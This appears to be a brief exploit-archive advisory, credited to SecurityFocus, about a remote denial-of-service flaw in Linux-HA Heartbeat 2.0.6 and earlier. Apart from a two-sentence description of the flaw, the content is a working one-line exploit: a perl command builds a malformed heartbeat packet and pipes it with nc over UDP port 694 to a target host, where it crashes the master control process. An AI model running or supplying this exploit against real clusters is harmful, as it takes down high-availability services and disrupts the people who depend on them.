Linux-HA Heartbeat <= 2.0.6 - Remote Denial of Service Vulnerability



source: http://www.securityfocus.com/bid/19516/info


Linux-HA Heartbeat is prone to a remote denial-of-service vulnerability.

By successfully exploiting this issue, attackers can crash the master control process. This may result in the failure of services that depend on the application's functionality.

perl -e 'print "###\n2147483647heart attack:%%%\n"' | nc -u 192.168.1.12 694